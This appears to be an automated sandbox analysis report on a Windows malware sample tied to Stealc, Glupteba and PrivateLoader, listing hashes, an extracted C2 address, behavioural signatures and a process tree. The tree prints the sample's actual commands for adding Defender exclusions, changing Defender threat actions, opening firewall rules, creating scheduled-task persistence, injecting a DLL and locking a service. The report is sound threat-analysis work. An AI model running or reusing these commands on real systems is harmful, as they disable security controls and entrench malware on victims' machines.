Analysis

  • max time kernel
    297s
  • max time network
    283s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    06-05-2024 22:31

General

  • Target

    2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe

  • Size

    392KB

  • MD5

    ccc754d02cc1188f0a0477b306539065

  • SHA1

    8a73b2e84fbdcadfaa98cc325c2222096bdc309b

  • SHA256

    2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38

  • SHA512

    6cabd1b19ddd94280528e4c2512e222bacc9bea6806e1df5610ffd3d993f52c4599e65fc7573d3d426e4d6d8c3756244e3e242b55b499796222f971b15ca8e0a

  • SSDEEP

    6144:htbMqLyDywnR6E5qkDPWQo9f+1llNEaVl5CMba/W1i5adCexXadKxQ3qhqrS8PbH:ht4qLC7RFfT7Ew5Csfi5advxaVkk

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.150

Attributes
  • url_path

    /c698e1bc8a2f5e6d.php

Signatures

  • Detect ZGRat V1 3 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 17 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 50 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 4 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 49 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Drops Chrome extension 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 28 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe
    "C:\Users\Admin\AppData\Local\Temp\2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe" -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3000
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      2⤵
        PID:2692
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        2⤵
        • Drops startup file
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2596
        • C:\Users\Admin\Pictures\y33nxYtvSjNLx4vNYB7tiWey.exe
          "C:\Users\Admin\Pictures\y33nxYtvSjNLx4vNYB7tiWey.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1656
          • C:\Users\Admin\AppData\Local\Temp\u1a0.0.exe
            "C:\Users\Admin\AppData\Local\Temp\u1a0.0.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:1264
          • C:\Users\Admin\AppData\Local\Temp\u1a0.1.exe
            "C:\Users\Admin\AppData\Local\Temp\u1a0.1.exe"
            4⤵
            • Executes dropped EXE
            • Checks SCSI registry key(s)
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1428
            • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
              "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
              5⤵
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:2344
        • C:\Users\Admin\Pictures\q065RXrpbKOC0YeuuKrC4EOS.exe
          "C:\Users\Admin\Pictures\q065RXrpbKOC0YeuuKrC4EOS.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:288
          • C:\Users\Admin\Pictures\q065RXrpbKOC0YeuuKrC4EOS.exe
            "C:\Users\Admin\Pictures\q065RXrpbKOC0YeuuKrC4EOS.exe"
            4⤵
            • Windows security bypass
            • Executes dropped EXE
            • Windows security modification
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1876
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2240
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                • Modifies data under HKEY_USERS
                PID:1328
        • C:\Users\Admin\Pictures\ApphPhDRe2tlB6a1tCVRtP7z.exe
          "C:\Users\Admin\Pictures\ApphPhDRe2tlB6a1tCVRtP7z.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1228
          • C:\Users\Admin\Pictures\ApphPhDRe2tlB6a1tCVRtP7z.exe
            "C:\Users\Admin\Pictures\ApphPhDRe2tlB6a1tCVRtP7z.exe"
            4⤵
            • Windows security bypass
            • Executes dropped EXE
            • Windows security modification
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2500
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2516
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                PID:3036
        • C:\Users\Admin\Pictures\pRrCyuBaRb5RdBqaTWhijJH4.exe
          "C:\Users\Admin\Pictures\pRrCyuBaRb5RdBqaTWhijJH4.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2404
          • C:\Users\Admin\Pictures\pRrCyuBaRb5RdBqaTWhijJH4.exe
            "C:\Users\Admin\Pictures\pRrCyuBaRb5RdBqaTWhijJH4.exe"
            4⤵
            • Windows security bypass
            • Executes dropped EXE
            • Windows security modification
            • Adds Run key to start application
            • Modifies data under HKEY_USERS
            PID:2576
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2644
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                • Modifies data under HKEY_USERS
                PID:2888
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe
              5⤵
              • Loads dropped DLL
              • Adds Run key to start application
              • Manipulates WinMonFS driver.
              • Drops file in Windows directory
              • Suspicious use of AdjustPrivilegeToken
              PID:2384
              • C:\Windows\system32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                6⤵
                • Creates scheduled task(s)
                PID:2372
              • C:\Windows\system32\schtasks.exe
                schtasks /delete /tn ScheduledUpdate /f
                6⤵
                  PID:1864
                • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                  "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Modifies system certificate store
                  PID:1800
                • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                  C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1332
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\Sysnative\bcdedit.exe /v
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:856
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  6⤵
                  • Creates scheduled task(s)
                  PID:2476
                • C:\Windows\windefender.exe
                  "C:\Windows\windefender.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2856
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                    7⤵
                      PID:2396
                      • C:\Windows\SysWOW64\sc.exe
                        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                        8⤵
                        • Launches sc.exe
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1044
            • C:\Users\Admin\Pictures\ZjvjOnJbg2yxQ1n04dwCKXPu.exe
              "C:\Users\Admin\Pictures\ZjvjOnJbg2yxQ1n04dwCKXPu.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:876
              • C:\Users\Admin\Pictures\ZjvjOnJbg2yxQ1n04dwCKXPu.exe
                "C:\Users\Admin\Pictures\ZjvjOnJbg2yxQ1n04dwCKXPu.exe"
                4⤵
                • Windows security bypass
                • Executes dropped EXE
                • Windows security modification
                • Adds Run key to start application
                • Checks for VirtualBox DLLs, possible anti-VM trick
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1728
                • C:\Windows\system32\cmd.exe
                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2180
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                    6⤵
                    • Modifies Windows Firewall
                    PID:1668
            • C:\Users\Admin\Pictures\MPYgUYg7TICU1jZEJCtJmCRi.exe
              "C:\Users\Admin\Pictures\MPYgUYg7TICU1jZEJCtJmCRi.exe"
              3⤵
              • Modifies firewall policy service
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Drops file in System32 directory
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:1976
            • C:\Users\Admin\Pictures\UxolFKgCi4xXZqnacLuUBPnw.exe
              "C:\Users\Admin\Pictures\UxolFKgCi4xXZqnacLuUBPnw.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2248
              • C:\Users\Admin\AppData\Local\Temp\7zSCED4.tmp\Install.exe
                .\Install.exe /ThYFdiduvbI "385118" /S
                4⤵
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Loads dropped DLL
                • Enumerates system info in registry
                PID:2136
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  5⤵
                    PID:2080
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                      6⤵
                        PID:1580
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          7⤵
                            PID:928
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              8⤵
                                PID:932
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                            6⤵
                              PID:1184
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                7⤵
                                  PID:696
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                    8⤵
                                      PID:2404
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                  6⤵
                                    PID:2424
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      7⤵
                                        PID:1628
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                          8⤵
                                            PID:2964
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                        6⤵
                                          PID:2844
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                            7⤵
                                              PID:904
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                8⤵
                                                  PID:1136
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                              6⤵
                                                PID:708
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                  7⤵
                                                    PID:2192
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                      8⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Drops file in System32 directory
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:552
                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                        9⤵
                                                          PID:2416
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                  5⤵
                                                    PID:1764
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                      6⤵
                                                        PID:1608
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                          7⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Drops file in System32 directory
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2612
                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                            8⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2116
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\ZYCmLit.exe\" it /ivfdidSNgN 385118 /S" /V1 /F
                                                      5⤵
                                                      • Drops file in Windows directory
                                                      • Creates scheduled task(s)
                                                      PID:2452
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                      5⤵
                                                        PID:1676
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                          6⤵
                                                            PID:1632
                                                            • \??\c:\windows\SysWOW64\schtasks.exe
                                                              schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                              7⤵
                                                                PID:1320
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 2056 -s 848
                                                      2⤵
                                                        PID:2708
                                                    • C:\Windows\system32\makecab.exe
                                                      "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240506223134.log C:\Windows\Logs\CBS\CbsPersist_20240506223134.cab
                                                      1⤵
                                                      • Drops file in Windows directory
                                                      PID:1544
                                                    • C:\Windows\windefender.exe
                                                      C:\Windows\windefender.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Modifies data under HKEY_USERS
                                                      PID:2980
                                                    • C:\Windows\system32\taskeng.exe
                                                      taskeng.exe {CC2FDACC-45F2-4E6B-BBC3-5C72F23CE3B9} S-1-5-18:NT AUTHORITY\System:Service:
                                                      1⤵
                                                        PID:2896
                                                        • C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\ZYCmLit.exe
                                                          C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\ZYCmLit.exe it /ivfdidSNgN 385118 /S
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Drops file in System32 directory
                                                          PID:2776
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                            3⤵
                                                              PID:1544
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                4⤵
                                                                  PID:1980
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                    5⤵
                                                                      PID:1748
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                        6⤵
                                                                          PID:2044
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                      4⤵
                                                                        PID:2744
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                          5⤵
                                                                            PID:1712
                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                              6⤵
                                                                                PID:2764
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                            4⤵
                                                                              PID:2604
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                5⤵
                                                                                  PID:2932
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    6⤵
                                                                                      PID:2560
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                  4⤵
                                                                                    PID:2208
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                      5⤵
                                                                                        PID:2552
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          6⤵
                                                                                            PID:2724
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                        4⤵
                                                                                          PID:2640
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                            5⤵
                                                                                              PID:1344
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1936
                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
